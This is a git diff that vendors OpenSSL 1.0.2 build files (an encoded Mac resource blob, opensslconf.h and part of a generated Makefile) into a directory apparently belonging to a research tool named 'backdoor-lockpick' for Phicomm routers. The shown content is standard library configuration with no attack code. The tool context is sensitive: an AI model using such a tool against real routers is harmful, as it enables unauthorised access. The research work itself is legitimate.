+cD!d%C!!#0!!!#J`+&2c`"'B+r2!!"!TMCQpX$34Q!!&[!!!+%!S6r1m,r1m!0$!
+!''p`C@jcFfaTEQ0XG@4PCQpXC'9bF'&dD!!BEh"PEP066%PZBfaeC'9'EfaNCA*
+3BA4S"J4P!!2mlJ4Rr1d+r1i!"!TdEb!J$34R!!*Z!!!+&`SQ"'J%D3d%D!!#0!!
+!#Km+*[cX"'S+r1`!"!TQD@aP$34U!!&Y!!!+)JSP"'X-"'X!%!!+Eh"PER0cE(B
+ZD!!#!!!0"'N!!M3!!!SA#Krmk`4X#[cV!!3+BfC[E!d%E!!"E`!!#KX+([cU#rc
+U!#3`!""MFRP`G'pQEfaNCA*`BA4S!""MFRP`G'p'EfaNCA*3BA4S"[cY!!!#"'!
+!!J4Y"'i0"'d!!dN!!JSY#PImkIcS"'m+r1N!'#jMEh*PBh*PE#SU+LS!!!!!!!#
+3!!"ZG@aX!IcS!!!'"'m!!rcR"(!%F3Vmj`!%#QY[Bf`0"(!!!@d!!!Sa#M6mjJV
+mjJ!%#Q&XD@%'"(%!!rcP"()%F`Vmj3!%#QPZFfJ0"()!!M3!!!Sh#Mrmj!4d#[c
+N!!3+BfC[E!d%G!!"E`!!#MX+2[cM#rcM!$3`!"K[F'9ZFh0XD@jME(9NC@C[E'4
+PFR"KG'J!''p`C@j68da*EQ0XG@4P4QpXC'9b8'&dD!B%F`!$r1)%GIcK#[cL!!3
++G'mJ)!d%G3!#EJ!!#N)+834f"(F0"(B!!M3!!!T+#P(mi!4i#[cJ!!3+CQPXC3d
+%H!!"E3!!#Nd+8!4j$!4j!!i!#(4YC'PQCLjS!!)!!!d%G`!#0!!!#N)+5[cI"(S
++r0m!"!TMCQpX$34k!!&[!!!+4JT*r0i,r0i!*$!!%'0bHA"dEfC[E'4PFR"KG'J
+!%'0bHA"dEdC[E'4PFP"KG'J'r1%!!!)%EJ!#"(X%I!d%H`!#E!!##PJ+@2cGr0`
+"r0d!!!(mh!!!!J4m!!)%I34q$34p!!*X!!)+@!TBr0[mfJ(mf`!!!IcD!!!#"(i
+!!J4r")!0"(m!!dN!!JTB#S,mfIcB")%+r0N!'#jMEh*PBh*PE#SU+LS!!!!!!!#
+3!!"ZG@aX!IcB!!!'")%!!rcA"))%J`Vme`!%#QY[Bf`0"))!!@d!!!TF#PrmeJV
+meJ!%#Q&XD@%'")-!!rc9")3%K3Vme3!%#QPZFfJ0")3!!M3!!!TL#QVme!5'#[c
+8!!3+BfC[E!d%KJ!"E`!!#QB+DIc6#rc6!$3`!"K[F'9ZFh0XD@jME(9NC@C[E'4
+PFR"KG'J!''p`C@j68da*EQ0XG@4P4QpXC'9b8'&dD!B%K3!$r0)%Krc4#[c5!!3
++G'mJ)!d%K`!#EJ!!#Qd+I!5)")N0")J!!M3!!!Te#Rcmd!5+#[c3!!3+CQPXC3d
+%LJ!"E3!!#RJ+H`5,$!5,!!`!"Q9IEh-ZD!!#!!!0")N!!M3!!!TY#RAmc`5-#[c
+2!!3+BfC[E!d%M!!"E`!!#R%+G2c1#rc1!#B`!"&[F'9ZFh0XCQpXC'9bF'&dD!!
+4Eh"PER0cE%C[E'4PFP"KG'J'r0%!!!)%J!!#")d%MJd%M3!$53!##S-+VIc0r-`
+%M`Vmc3!B,Q0[FQ9MFQ9X+LSU+J!!!!!!!*!!!'jeE'`"r-`!!!B%M`!$r-X%N!!
+%N3Vmb`!%#QY[Bf`0"*!!!!&Y!!!+K`U+r-S+r-S!"!TKE'PK"J54!!2mb355"*-
++r-N!"!TTER0S$355!!)d!!!+M3U9r-J%P!Vmb!!%#Q0QEf`0"*3!!@m!!!U4#T6
+ma`[ma`!d-!!BEh"PER0cE'PZBfaeC'9QEfaNCA*`BA4S!"K[F'9Z8e0-5@jME(9
+NC8C[E'4PFP"KG'J'"*-!!rc'"*Ama3VmaJ!%#R4[)#!0"*8!!Qi!!!UB#UF%PJ5
+A$35@!!)d!!!+S!URr-3%Q!Vma!!%#QCTE'80"*J!!@d!!!UM#UB%Q3`%Q3!0!!G
+PAfpc-LjS!!)!!!d%P`!#0!!!#TJ+S2c$"*S+r--!"!TMCQpX$35D!!&[!!!+R!U
+Ir-),r-)!*M!!%@p`C@jcFfaQEfaNCA*`BA4S!"&[F'9ZFh0X4QpXC'9b8'&dD!E
+ma3!!!J51!!)%Qrc"$35E!!*X!!)+VJUZr-$m[`(m`!!!!Ibr!!!#r-%!!!d!#3!
+"E3!!!!!!!3!I!Irq!!!#!!B!!J5F"*d0"*`!!Q`!!J!!!!$m[[bp!Ibq!!!"r,d
+!!!)%R3!#"*i%R`d%RJ!#E!!##V%+b!5Jr,`0"+!!!dN!!JUa#XMmZ`5K"+)+r,X
+!'#jcHA0[C'a[Cf&cDh)!!!!!!!!!!&4&@&30"+%!!@d!!!Ua#V3%S``%S`!'!!!
+!!J!!"J5L!!2mZJ5N"+8+r,S!"!TLG'jc$35N!!&+!!!+Y`Um"+B#"+B!!J5Rr,N
+0"+F!!@d!!!Uh#VS%U!`%U!!+!!4%EfjP!!)!!!,mZ3!!"J5P!!2mZ!5Tr,F+r,J
+!"!TRDACe$35T!!&Y!!!+[`V#r,B$r,B!"3EmY`!!!Ibm!!!#"*m!!J5Ur,80"+S
+!!Q`!!J!!!!$mY2bc!Ibd!!!"r,-!!!,mY3!!$J!#!!!2%!!$!",mXJ5V"+`%V35
+Z"+m%X!5a",)%X`5d",8%YJ5hr,(mX2b[r+i"r,)!!"!%U`!3r+hmV2bVr+VmUIb
+Sr+ImT[bPr+6mSrbLr+(mS2bIr*i+r+d!'#jKCACdEf&`F'jeE'`!!)!!!!#3!!!
+U+LSU#rbX!")`!!GdD'9`BA4S!!GdD'93BA4S#rbV!"``!!adD'9[E'4NC@aTEA-
+!$(4SC8pXC%4PE'PYF`[mUJ!J-!!1G'KPF(*[DQ9MG("KG'J!$R4SC9"bEfTPBh4
+3BA4S#rbT!"B`!!PdD'9YCA"KG'J!#A4SC8eP8'&dD![mU!!Q-!!4D@jME(9NC@C
+[E'4PFR"KG'J!%@PZBfaeC'9'EfaNCA*3BA4S#rbR!$3`!"K[F'9ZFh0XD@jME(9
+NC@C[E'4PFR"KG'J!''p`C@j68da*EQ0XG@4P4QpXC'9b8'&dD![mTJ!N-!!3Bh*
+jF(4[CQpXC'9bF'&dD!!3Bh*jF(4[4QpXC'9b8'&dD![mT3!H-!!0Fh0XCQpXC'9
+bF'&dD!!0Fh0X4QpXC'9b8'&dD![mT!!Q-!!4Eh"PER0cE'C[E'4PFR"KG'J!%@p
+`C@jcFfa'EfaNCA*3BA4S#rbM!#i`!"9dD'9ZCAGQEfaNCA*bC@CPFQ9ZBf8!&A4
+SC8jPGdC[E'4PFP*PCQ9bC@jMC3[mSJ!8-!!)G'9YF("KG'J!#(4PEA"3BA4S!Ib
+K!!!"r+!!!!(mR`!!!IbH!!!1"+`!"a$mR35ir*cmQ`5j",VmQJVmR3!B,Q&PGR4
+[BA"`ER9XE!!!J!!!!*!!!#SU+LS0",J!!@X!!!!!#XJ%Z`)%Z`!#!!8%[!)%[!!
+#"*lmQ3,mQ3!!!IbF!!!#r*X!!"!%Z3!!%!5k!)B!(rbBr*ImP[b9r*6mNrb5!#c
+mNIb3!2b2r)lmMIb-!%rmL`"D!&[mLJ"Nr)N!EIb)r)ImKJ#2r)AmK2b$r),mJIb
+!r(rmI[apr(cmH`#Tr(VmHIair(F![Iaf!-ImG3$8!1)!l!$j!3-"%!%D!5F"-3%
+q!8J"93&I!@`"GJ'$!Bd"QJ'N!E%"Z`()!G)"h`(T!IB#!!)0!KF#*!)Z!MX#43*
+5!P`#D3*c!S!#LJ+A!U%#VJ+m!XB#d`,G!ZS#p!-"!`X$'!-L!bm$130'!e!$A30
+R!h3$IJ1,!jN$S`1`!lS$a`24!pi$l!2f"!-%%`3K"#m%234,"&X%D`4j")X%Q35
+Mr(3%U2acr(,mF3VmQ!!%#Q0[BQS+r*F!'#jPBA*cCQCNFQ&XDA-!!!!!!!!J!'&
+QC()+r*B!"!TMG(Kd#rb9!")`!!GdD'9`BA4S!!GdD'93BA4S#[b8!!3+BA0MFJV
+mN`!%#R4iC'`,r*)!($!!$(4SC@pXC'4PE'PYF`!-G'KP6faN4'9XD@ec#[b4!!3
++BfPdE32mN!$rr3[mM`!J-!!1G'KPF(*[DQ9MG("KG'J!$R4SC9"bEfTPBh43BA4
+S!rb1rri+r)d!"!T849K8#rb-!"B`!!PdD'9YCA"KG'J!#A4SC8eP8'&dD![mL`!
+Q-!!4D@jME(9NC@C[E'4PFR"KG'J!%@PZBfaeC'9'EfaNCA*3BA4S#rb+!$3`!"K
+[F'9ZFh0XD@jME(9NC@C[E'4PFR"KG'J!''p`C@j68da*EQ0XG@4P4QpXC'9b8'&
+dD![mL3!N-!!3Bh*jF(4[CQpXC'9bF'&dD!!3Bh*jF(4[4QpXC'9b8'&dD![mL!!
+H-!!0Fh0XCQpXC'9bF'&dD!!0Fh0X4QpXC'9b8'&dD![mK`!Q-!!4Eh"PER0cE'C
+[E'4PFR"KG'J!%@p`C@jcFfa'EfaNCA*3BA4S#[b'!!3+BfC[E!VmK3!B,QeTFf0
+cE'0d+LSU+J!!!!!!!*!!!#SU+LS+r)3!"!TcC@aP#[b$!"JZBfpbC@4PE'mU+LS
+U!!!!!!!!N!!!+LSU+J(mJJ!!![b"!!!+r)!!"!TVEf0X#[ar!!3+D@jcD!2mIJ!
+%#[ap!"JZBfpbC@0bC@`U+LSU!!!!!!!!N!!!ER9XE!VmI!!%#R*cE(3,r(X!,M!
+!&A4SC@jPGfC[E'4PFR*PCQ9bC@jMC3!9G'KP6Q9h4QpXC'9b8Q9QCA*PEQ0P#[a
+k!!3+F'jKE3VmH3!%#Q&XD@%+r(J!"!TdEb!J#[ah!!3+CQPXC32mGJ!'#rae!"3
+`!!KdC@e`F'&dD!!)G'9YF&"KG'J+r(3!"!TLG'jc#[ac!!3+CfPfG32mFJ!&#[a
+a!"JZFhPcEf4XEfGKFfYb!!!!!!!!!!"849K8%IbD#XRJ%JUYi1%TDJ`!!LrM*N9
+4e%r&jLa&edrSaHBX4Nr%@qPF@eTVA&VU-NAE6m4Ek9aE@QYF@Z`bl5C&hNr,lbA
+Y*N9J!""2bf%!%59K!")Pl5C&B!!66mYK!"3Pl5C&B!!96mYK!"BPl5C&B!!A6m[
+Y*N9J!"K2amAQ,%C2&!!L+Q%!'9m!%#pK!"PK!"S[DJ`!'dmUB3!F,'S-!"eA!!K
+B!"i!(fK2+Q%!)'%!'@%!)5TK!"PI!"![B3!L$!!M6em!*%9J!#92A`!PDJ`!'dp
+K!#BUB3!F,'%!*ba'6bTK!#"K!#KK!#%UB3!CA`!6,f%!+5TK!"R1,f%!+Q%!+bp
+K!#`-!#02A`!9B3!Y*89J!#j2+Q%!)'%!+'%!)5TK!"PI!"-[B3!T+Q%!'9m!,Lp
+K!#TK!#m[B3!X$!!M6bTK!#"K!#KK!#%UB3!CA`!6,f%!+5TK!"PI!#i[B3!UB3!
+`,f%!,!`!)dpI!"9K!$%P4@!!,NmUB3!JB3!SB3!K+Q%!'9m!%bpK!#NUB3!CA`!
+Z,f%!+Q%!-LpK!#`-!#02A`!9B3!c*89J!#j2+Q%!)'%!+'%!)5TK!"PI!"-[B3!
+T+Q%!'9m!,LpK!#TK!$3[B3!X$!!M6em!&@%!059&B!!Z6bTK!#"K!#KK!#%UB3!
+CA`!6,f%!+5TK!"PI!#i[B3!UB3!f,f%!,!`!)dpI!"9K!$FP4@!!,NmUB3!JB3!
+SB3!K+Q%!'9m!%bpK!#NUB3!CA`!Z,f%!+Q%!1#pK!#`-!#02A`!9B3!j*89J!#j
+2+Q%!)'%!+'%!)5TK!"PI!"-[B3!T+Q%!'9m!,LpK!#TK!$S[B3!X$!!M6em!&@%
+!1b9&B!!Z6bTK!#"K!#KK!#%UB3!CA`!6,f%!+5TK!"PI!#i[B3!UB3!m,f%!,!`
+!)dpI!"9K!$dP4@!!,NmUB3!JB3!SB3!K+Q%!'9m!%bpK!#NUB3!CA`!Z,f%!+Q%
+!2LpK!#`-!#02A`!9B3!r*89J!#j2+Q%!)'%!+'%!)5TK!"PI!"-[B3!T+Q%!'9m
+!,LpK!#TK!%![B3!X$!!M6em!&@%!359&B!!Z6bTK!#"K!#KK!#%UB3!CA`!6,f%
+!+5TK!"PI!#i[B3!UB3"#,f%!,!`!)dpI!"9K!%-P4@!!,NmUB3!JB3!SB3!K+Q%
+!'9m!%bpK!#NUB3!CA`!Z,f%!+Q%!4#pK!#`-!#02A`!9B3"&*89J!#j2+Q%!)'%
+!+'%!)5TK!"PI!"-[B3!T+Q%!'9m!,LpK!#TK!%B[B3!X$!!M6em!&@%!4b9&B!!
+Z6bTK!#"K!#KK!#%UB3!CA`!6,f%!+5TK!"PI!#i[B3!UB3"),f%!,!`!)dpI!"9
+K!%NP4@!!,NmUB3!JB3!SB3!K+Q%!'9m!%bpK!#NUB3!CA`!Z,f%!+Q%!5LpK!#`
+-!#02A`!9B3",*89J!#j2+Q%!)'%!+'%!)5TK!"PI!"-[B3!T+Q%!'9m!,LpK!#T
+K!%`[B3!X$!!M6em!&@%!659&B!!Z6bTK!#"K!#KK!#%UB3!CA`!6,f%!+5TK!"P
+I!#i[B3!UB3"1,f%!,!`!)dpI!"9K!%mP4@!!,NmUB3!JB3!SB3!K+Q%!'9m!%bp
+K!#NUB3!CA`!Z,f%!+Q%!8#pK!#`-!#02A`!9B3"4*89J!#j2+Q%!)'%!+'%!)5T
+K!"PI!"-[B3!T+Q%!'9m!,LpK!#TK!&)[B3!X$!!M6em!&@%!8b9&B!!Z6bTK!#"
+K!#KK!#%UB3!CA`!6,f%!+5TK!"PI!#i[B3!UB3"8,f%!,!`!)dpI!"9K!&8P4@!
+!,NmUB3!JB3!SB3!K+Q%!'9m!%bpK!#NUB3!CA`!Z,f%!+Q%!9LpK!#`-!#02A`!
+9B3"A*89J!#j2+Q%!)'%!+'%!)5TK!"PI!"-[B3!T+Q%!'9m!,LpK!#TK!&J[B3!
+X$!!M6bTK!#"K!#KK!#%UB3!CA`!6,f%!+5TK!"PI!#i[B3!UB3"C,f%!,!`!)dp
+I!"9K!&SP4@!!,NmUB3!JB3!SB3!K+Q%!'9m!%bpK!#NUB3!CA`!Z,f%!+Q%!@bp
+K!#`-!#02A`!9B3"F*89J!#j2+Q%!)'%!+'%!)5TK!"PI!"-[B3!T+Q%!'9m!,Lp
+K!#TK!&d[B3!X$!!M6em!&@%!AL9&B!!Z6bTK!#"K!#KK!#%UB3!CA`!6,f%!+5T
+K!"PI!#i[B3!UB3"I,f%!,!`!)dpI!"9K!'!P4@!!,NmUB3!JB3!SB3!K+Q%!'9m
+!%bpK!#NUB3!CA`!Z,f%!+Q%!B5pK!#`-!#02A`!9B3"L*89J!#j2+Q%!)'%!+'%
+!)5TK!"PI!"-[B3!T+Q%!'9m!,LpK!#TK!'-[B3!X$!!M6em!&@%!C#9&B!!Z6bT
+K!#"K!#KK!#%UB3!CA`!6,f%!+5TK!"PI!#i[B3!UB3"P,f%!,!`!)dpI!"9K!'B
+P4@!!,NmUB3!JB3!SB3!K+Q%!'9m!%bpK!#NUB3!CA`!Z,f%!+Q%!CbpK!#`-!#0
+2A`!9B3"S*89J!#j2+Q%!)'%!+'%!)5TK!"PI!"-[B3!T+Q%!'9m!,LpK!#TK!'N
+[B3!X$!!M6em!&@%!DL9&B!!Z6bTK!#"K!#KK!#%UB3!CA`!6,f%!+5TK!"PI!#i
+[B3!UB3"V,f%!,!`!)dmUB3!JB3!SB3!K+Q%!'9m!%bpK!#NUB3!CA`!Z,f%!+Q%
+!E#pK!#`-!#02A`!9B3"Y*89J!#j2+Q%!)'%!+'%!)5TK!"PI!"-[B3!T+Q%!'9m
+!,LpK!#TK!'i[B3!X$!!M6em!&@%!Eb9&B!!Z6bTK!#"K!#KK!#%UB3!CA`!6,f%
+!+5TK!"PI!#i[B3!UB3"`,f%!,!`!)dpI!"9K!(%P4@!!,NmUB3!JB3!SB3!K+Q%
+!'9m!%bpK!#NUB3!CA`!Z,f%!+Q%!FLpK!#`-!#02+Q%!)'%!+'%!)5TK!"PI!"-
+[B3!T+Q%!'9m!,LpK!#TK!(-[B3!X$!!M6em!&@%!G#9&B!!Z6bTK!#"K!#KK!#%
+UB3!CA`!6,f%!+5TK!"PI!#i[B3!UB3"e,f%!,!`!)dmUB3!JB3!SB3!K+Q%!'9m
+!%bpK!#NUB3!CA`!A,f%!+Q%!GLpK!#`-!#02+Q%!)'%!+'%!)5TK!"PI!"-[B3!
+T+Q%!'9m!&bpK!#TK!(F[B3!X$!!M6bTK!#"K!#KK!#%UB3!CA`!6,f%!+5TK!"P
+I!"F[B3!UB3"i,f%!,!`!)dmUB3!JB3!SB3!K+Q%!'9m!%bpK!#NUB3!CA`!A,f%
+!+Q%!H5pK!#`-!#02+Q%!)'%!+'%!)5TK!"PI!"-[B3!T+Q%!'9m!&bpK!#TK!(S
+[B3!X$!!M6bTK!#"K!#KK!#%UB3!CA`!6,f%!+5TK!"PI!"8[B3!UB3"l,f%!,!`
+!)dmUB3!JB3!SB3!K+Q%!'9m!%bpK!#NUB3!CA`!9,f%!+Q%!I#pK!#`-!#02+Q%
+!)'%!+'%!)5TK!"PI!"-[B3!T+Q%!'9m!&5pK!#TK!(d[B3!X$!!M6bTK!#"K!#K
+K!#%UB3!CA`!6,f%!+5TK!"PI!"J[B3!UB3"q,f%!,!`!)dmUB3!JB3!SB3!K+Q%
+!'9m!%bpK!#NUB3!CA`!B,f%!+Q%!IbpK!#`-!#028&92B3#!B3#"B3##DhCK!)0
+K!)4K!#)-!)82$!5Y!&%!5deKBfPZG'pcD#")4$T%CA0VG'p`)%C[E'4PFMT*EQ0
+[E@PZCcT[F'9ZFh0X,90139!Y-6Nj16%b-6%k6@&M6e-kE@YXD@jVFbjKF`!#!!!
+1"+i!!J6mF!5p!ra`!!%1",d!!3!%[J`%[J!'!!!!!J!!$J5[!!)%r'm%[`2mE`!
+%$J5r!!3!"-!%`36#"---"-!!%J!-6@&MD@jdEh0S)%K%!!)!!!`%`3!8!!j%CA0
+VG'p`)%C[E'4PFJ!#!!!-"-)!$J!)5@jMEfeTEQF!!J!!$!6$!"X!&@p`C@jcFf`
+Y8dj"8#da16Nj-6)a-3!#!!!-",!!4J"!6@&MD@jdEh0S)%K%1N4PFfYdEh!J4Qp
+XC'9b1NPZBfpYD@jR1Qp`C@jcFf`Y8dj"8#da16Nj-6)a-6T0B@028`!#!!!-",%
+!5!"#6@&MD@jdEh0S)%K%1N4PFfYdEh!J4QpXC'9b1NPZBfpYD@jR1Qp`C@jcFf`
+Y8dj"8#da16Nj-6)a-6TTEQ0XG@4P!!)!!!`%XJ"3!%T0B@0TER4[FfJJ5%3k4'9
+cDh4[F#"'EfaNCA)k5@jMEfeTEQFkEh"PER0cE#e66N&3,6%j16Na-M%a1QPZBfa
+eC'8kEh"PER0cE!!#!!!-",-!4`""6@&MD@jdEh0S)%K%1N4PFfYdEh!J4QpXC'9
+b1NPZBfpYD@jR1Qp`C@jcFf`Y8dj"8#da16Nj-6)a-6TMFRP`G'm!!J!!$!5d!%3
+!2NeKBfPZG'pcD#")4$T%CA0VG'p`)%C[E'4PFMT*EQ0[E@PZCcT[F'9ZFh0X,90
+139!Y-6Nj16%b-6%kFh0X!!)!!!`%Y3"!!$T0B@0TER4[FfJJ5%3k4'9cDh4[F#"
+'EfaNCA)k5@jMEfeTEQFkEh"PER0cE#e66N&3,6%j16Na-M%a!!)!!!i%YJ!"&!6
+%$J6%!!-B"-AmEJ6'$J6&!!-B"-ImE36)$J6(!!-B"-RmE!6+$J6*!!-B!"rmD`6
+,#[aV!!3+BfC[E!`%b`!1!!K*EQ0[E@PZC`!#!!!+r'`!"!TMCQpX$!6+!"X!&@p
+`C@jcFf`Y8dj"8#da16Nj-6)a-3!#!!!+r'd!"!TMCQpX$!6)!!d!"fPZBfaeC'8
+!!J!!#[aZ!!3+BfC[E!`%aJ!9!!peER4TG'aPC#"QEfaNCA)!!J!!$!5h!%i!5%e
+KBfPZG'pcD#")4$T%CA0VG'p`)%C[E'4PFMT*EQ0[E@PZCcT[F'9ZFh0X,90139!
+Y-6Nj16%b-6%kBh*jF(4[1RJe-$Pf-`!#!!!"r,%!!!(mX!!!!Ib[!!!"r+i!!'&
+cBh)!!3!-qYlHV3!!!3!!!*G#!!#@3J!!!AB!!$-8-0J!!!!F!AB!$h0MFhS!!!#
+#6Np853!!!)jcBh"d!!!!QP4&@&3!!3#QFh4jE!!!!,j$6d4&!!%!bN*14%`!!!$
+LBA"XG!!!!1j'8N9'!!!!qNP$6L-!!!%'D@0X0!!!!4*TBh-M!!!"(QPMFc3!!!%
+UD'CNFJ!!!6C659T&!!!"3PG3Eh-!!!&1!!$rr`!!!!!!!!!!!)$rre!!!"i!!!!
+!!)$rr`!!"cJ#DH#m"'Mrr`!!!*S!!!!!%iRrr`!!"Pi!!!!!"'Mrr`!!!53!!!!
+!!!$rrb!!!9)!!!!!!!(rra3!!@i#DG`%!)$rr`!!!Pi#DH"X!!$rr`!!!Ri!!!!
+!!)$rr`!!!S-#DH"d!*Err`!!!Si!!!!!!*Err`!!!j)!!!!!!*Err`!!"CB#DH%
+i!*Err`!!"GS#DH%dkF$rr`!!"[`!!!!!rrrrr`!!"a)!!!!!!)$rr`!!"b!!!!!
+!*4S:
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/opensslconf.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/opensslconf.h
new file mode 100644
index 0000000..bace0a1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/opensslconf.h
@@ -0,0 +1,126 @@
+/* MacOS/opensslconf.h */
+
+#if !(defined(VMS) || defined(__VMS)) /* VMS uses logical names instead */
+# if defined(HEADER_CRYPTLIB_H) && !defined(OPENSSLDIR)
+#  define OPENSSLDIR "/usr/local/ssl"
+# endif
+#endif
+
+#if defined(HEADER_IDEA_H) && !defined(IDEA_INT)
+# define IDEA_INT unsigned int
+#endif
+
+#if defined(HEADER_MD2_H) && !defined(MD2_INT)
+# define MD2_INT unsigned int
+#endif
+
+#if defined(HEADER_RC2_H) && !defined(RC2_INT)
+/* I need to put in a mod for the alpha - eay */
+# define RC2_INT unsigned int
+#endif
+
+#if defined(HEADER_RC4_H)
+# if !defined(RC4_INT)
+/*
+ * using int types make the structure larger but make the code faster on most
+ * boxes I have tested - up to %20 faster.
+ */
+/*-
+ * I don't know what does "most" mean, but declaring "int" is a must on:
+ * - Intel P6 because partial register stalls are very expensive;
+ * - elder Alpha because it lacks byte load/store instructions;
+ */
+#  define RC4_INT unsigned char
+# endif
+# if !defined(RC4_CHUNK)
+/*
+ * This enables code handling data aligned at natural CPU word
+ * boundary. See crypto/rc4/rc4_enc.c for further details.
+ */
+#  define RC4_CHUNK unsigned long
+# endif
+#endif
+
+#if defined(HEADER_DES_H) && !defined(DES_LONG)
+/*
+ * If this is set to 'unsigned int' on a DEC Alpha, this gives about a %20
+ * speed up (longs are 8 bytes, int's are 4).
+ */
+# ifndef DES_LONG
+#  define DES_LONG unsigned long
+# endif
+#endif
+
+#if defined(HEADER_BN_H) && !defined(CONFIG_HEADER_BN_H)
+# define CONFIG_HEADER_BN_H
+# if __option(longlong)
+#  define BN_LLONG
+# else
+#  undef BN_LLONG
+# endif
+
+/* Should we define BN_DIV2W here? */
+
+/* Only one for the following should be defined */
+/*
+ * The prime number generation stuff may not work when EIGHT_BIT but I don't
+ * care since I've only used this mode for debuging the bignum libraries
+ */
+# undef SIXTY_FOUR_BIT_LONG
+# undef SIXTY_FOUR_BIT
+# define THIRTY_TWO_BIT
+# undef SIXTEEN_BIT
+# undef EIGHT_BIT
+#endif
+
+#if defined(HEADER_RC4_LOCL_H) && !defined(CONFIG_HEADER_RC4_LOCL_H)
+# define CONFIG_HEADER_RC4_LOCL_H
+/*
+ * if this is defined data[i] is used instead of *data, this is a %20 speedup
+ * on x86
+ */
+# undef RC4_INDEX
+#endif
+
+#if defined(HEADER_BF_LOCL_H) && !defined(CONFIG_HEADER_BF_LOCL_H)
+# define CONFIG_HEADER_BF_LOCL_H
+# define BF_PTR
+#endif                          /* HEADER_BF_LOCL_H */
+
+#if defined(HEADER_DES_LOCL_H) && !defined(CONFIG_HEADER_DES_LOCL_H)
+# define CONFIG_HEADER_DES_LOCL_H
+/*
+ * the following is tweaked from a config script, that is why it is a
+ * protected undef/define
+ */
+# ifndef DES_PTR
+#  define DES_PTR
+# endif
+
+/*
+ * This helps C compiler generate the correct code for multiple functional
+ * units.  It reduces register dependancies at the expense of 2 more
+ * registers
+ */
+# ifndef DES_RISC1
+#  define DES_RISC1
+# endif
+
+# ifndef DES_RISC2
+#  undef DES_RISC2
+# endif
+
+# if defined(DES_RISC1) && defined(DES_RISC2)
+YOU SHOULD NOT HAVE BOTH DES_RISC1 AND DES_RISC2 DEFINED ! !!!!
+# endif
+/*
+ * Unroll the inner loop, this sometimes helps, sometimes hinders. Very mucy
+ * CPU dependant
+ */
+# ifndef DES_UNROLL
+#  define DES_UNROLL
+# endif
+#endif                          /* HEADER_DES_LOCL_H */
+#ifndef __POWERPC__
+# define MD32_XARRAY
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile
new file mode 100644
index 0000000..8b705a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Makefile
@@ -0,0 +1,688 @@
+### Generated automatically from Makefile.org by Configure.
+
+##
+## Makefile for OpenSSL
+##
+
+VERSION=1.0.2
+MAJOR=1
+MINOR=0.2
+SHLIB_VERSION_NUMBER=1.0.0
+SHLIB_VERSION_HISTORY=
+SHLIB_MAJOR=1
+SHLIB_MINOR=0.0
+SHLIB_EXT=.so.$(SHLIB_MAJOR).$(SHLIB_MINOR)
+PLATFORM=linux-x86_64-musl
+OPTIONS=enable-rsa enable-md5 --prefix=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt --openssldir=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt no-asm no-comp no-dso no-dtls1 no-ec no-ec_nistp_64_gcc_128 no-ecdh no-ecdsa no-engine no-err no-gmp no-gost no-hw no-idea no-jpake no-krb5 no-libunbound no-md2 no-psk no-rc5 no-rfc3779 no-sctp no-shared no-srp no-ssl-trace no-ssl2 no-ssl3 no-store no-threads no-unit-test no-zlib no-zlib-dynamic static-engine
+CONFIGURE_ARGS=no-shared no-zlib disable-ec enable-rsa enable-md5 no-ssl2 no-ssl3 no-threads no-krb5 no-asm no-hw no-dso no-engine no-dtls1 no-idea no-comp no-err no-psk no-srp linux-x86_64-musl --prefix=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt --openssldir=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt
+SHLIB_TARGET=linux-shared
+
+# HERE indicates where this Makefile lives.  This can be used to indicate
+# where sub-Makefiles are expected to be.  Currently has very limited usage,
+# and should probably not be bothered with at all.
+HERE=.
+
+# INSTALL_PREFIX is for package builders so that they can configure
+# for, say, /usr/ and yet have everything installed to /tmp/somedir/usr/.
+# Normally it is left empty.
+INSTALL_PREFIX=
+INSTALLTOP=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt
+
+# Do not edit this manually. Use Configure --openssldir=DIR do change this!
+OPENSSLDIR=/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt
+
+# NO_IDEA - Define to build without the IDEA algorithm
+# NO_RC4  - Define to build without the RC4 algorithm
+# NO_RC2  - Define to build without the RC2 algorithm
+# THREADS - Define when building with threads, you will probably also need any
+#           system defines as well, i.e. _REENTERANT for Solaris 2.[34]
+# TERMIO  - Define the termio terminal subsystem, needed if sgtty is missing.
+# TERMIOS - Define the termios terminal subsystem, Silicon Graphics.
+# LONGCRYPT - Define to use HPUX 10.x's long password modification to crypt(3).
+# DEVRANDOM - Give this the value of the 'random device' if your OS supports
+#           one.  32 bytes will be read from this when the random
+#           number generator is initalised.
+# SSL_FORBID_ENULL - define if you want the server to be not able to use the
+#           NULL encryption ciphers.
+#
+# LOCK_DEBUG - turns on lots of lock debug output :-)
+# REF_CHECK - turn on some xyz_free() assertions.
+# REF_PRINT - prints some stuff on structure free.
+# CRYPTO_MDEBUG - turns on my 'memory leak' detecting stuff
+# MFUNC - Make all Malloc/Free/Realloc calls call
+#       CRYPTO_malloc/CRYPTO_free/CRYPTO_realloc which can be setup to
+#       call application defined callbacks via CRYPTO_set_mem_functions()
+# MD5_ASM needs to be defined to use the x86 assembler for MD5
+# SHA1_ASM needs to be defined to use the x86 assembler for SHA1
+# RMD160_ASM needs to be defined to use the x86 assembler for RIPEMD160
+# Do not define B_ENDIAN or L_ENDIAN if 'unsigned long' == 8.  It must
+# equal 4.
+# PKCS1_CHECK - pkcs1 tests.
+
+CC= musl-gcc
+CFLAG= -DOPENSSL_NO_ERR -m64 -DL_ENDIAN -DTERMIOS -Os -Wall
